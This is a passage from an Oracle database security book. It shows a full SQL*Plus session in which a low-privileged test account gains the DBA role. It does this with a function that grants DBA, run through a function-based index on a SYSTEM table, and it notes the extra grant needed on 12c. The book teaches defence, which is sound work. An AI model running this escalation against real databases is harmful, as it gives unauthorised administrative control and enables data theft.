Database Reference
In-Depth Information
Now we escalate the test account to DBA through an index on SYSTEM's PUP table:
SQL*Plus: Release 11.2.0.2.0 Production on Wed Dec 11 09:47:26 2013
Copyright (c) 1982, 2010, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.2.0 - Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
SQL> conn test/o
Connected.
SQL> CREATE OR REPLACE FUNCTION test.Y (GASP VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID
CURRENT_USER IS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO TEST';
COMMIT;
RETURN 'GASP';
END;
/ 2 3 4 5 6 7 8
Function created.
SQL> grant execute on test.y to public;
Grant succeeded.
SQL> create index system.escalation_index on system.SQLPLUS_PRODUCT_PROFILE(test.y('name'));
Index created.
SQL> set role dba;
Role set.
The interesting point of this exploit is that it does not require
SELECT
privilege on the indexed table to execute
the function with the privileges of the table owner. This is new attack research discovered by the author original to
this topic.
The previous exploit is reliable on 11g but needs the addition of this command on 12c:
grant inherit privileges on user system to test;
So in this respect, 12c has a significant security improvement from 11g. However, in terms of mainstream
privileged access control, the main threat is still present, as you will see in Chapter 14. Table
13-2
categorizes the
main privileged account management strategies in descending order of security risk, with the first strategy being
the riskiest. It is a listing of separate categories, but also a development process moving from the top to the bottom
through a maturity model. Systems go from development to production from 1 to 6 in the previous table. Which of the
following categories does your organization fit into?
